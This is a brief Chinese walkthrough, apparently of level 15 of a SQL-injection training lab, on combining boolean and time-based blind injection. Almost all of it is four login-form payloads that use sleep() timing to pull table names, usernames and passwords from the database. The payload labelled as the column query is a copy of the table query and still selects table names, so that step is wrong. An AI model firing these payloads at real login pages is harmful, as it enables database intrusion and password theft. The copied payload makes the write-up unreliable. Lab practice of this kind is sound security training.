這一關來到了第 15 關,值得注意的是,這一關是布爾和時間盲注的結合關,很好玩哦~
因爲有時間盲注,這裏就直接上菜了,下面是幾個例子
–查表
uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查列
uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查用戶名
uname=admin' and if(ascii(substr((select group_concat(username) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查密碼
uname=admin' and if(ascii(substr((select group_concat(password) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
也可以像第 8 關那樣寫一個腳本,因爲只要掌握基本原理就可以寫,這裏就不再構造了…
😄